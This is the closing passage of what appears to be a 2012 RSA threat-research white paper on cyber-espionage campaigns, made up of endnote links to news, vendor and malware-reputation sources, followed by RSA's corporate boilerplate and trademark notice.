DISCLAIMS IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A 
PARTICULAR PURPOSE. 
                                    
i http://www.wired.com/threatlevel/2010/01/operation-aurora/ 
ii http://www.scribd.com/doc/13731776/Tracking-GhostNet-Investigating-a-Cyber-Espionage-
Network 
iii http://googleonlinesecurity.blogspot.com/2012/06/security-warnings-for-suspected-state.html 
iv http://contagiodump.blogspot.com/2011/02/targeted-attacks-against-personal.html 
v http://thediplomat.com/flashpoints-blog/2011/06/07/china-cyber-attack-fallacies/ 
vi http://www.yunsec.net/a/school/bdzs/fmuma/2010/0602/4175.html 
vii http://www.yunsec.net/a/school/bdzs/fmuma/2010/0602/4175.html 
viii http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-
accounts/12462 
ix http://www.mcafee.com/us/resources/white-papers/foundstone/wp-know-your-digital-enemy.pdf 
x http://www.malwaredomainlist.com/mdl.php?search=wsdhealthy.com&colsearch=All&quantity=50 
xi http://www.mywot.com/en/scorecard/wsdhealthy.com 
xii http://www.malwaregroup.com/domains/details/wsdhealthy.com 
 
 

ABOUT RSA 
RSA, The Security Division of EMC, is the premier provider of security, risk 
and compliance management solutions for business acceleration. RSA helps 
the world’s leading organizations succeed by solving their most complex 
and sensitive security challenges. These challenges include managing 
organizational risk, safeguarding mobile access and collaboration, proving 
compliance, and securing virtual and cloud environments.  

Combining business-critical controls in identity assurance, encryption &  
key management, SIEM, Data Loss Prevention and Fraud Protection with 
industry leading eGRC capabilities and robust consulting services, RSA 
brings visibility and trust to millions of user identities, the transactions that 
they perform and the data that is generated. For more information, please 
visit www.RSA.com and www.EMC.com. 

EMC2, EMC, RSA, FirstWatch, NetWitness and the RSA logo are registered trademarks or trademarks of 
EMC Corporation in the United States and other countries. All other trademarks used herein are the 
property of their respective owners. ©2012 EMC Corporation. All rights reserved. Published in the USA. 
 
 
 
 

www.emc.com/rsa 

 

 

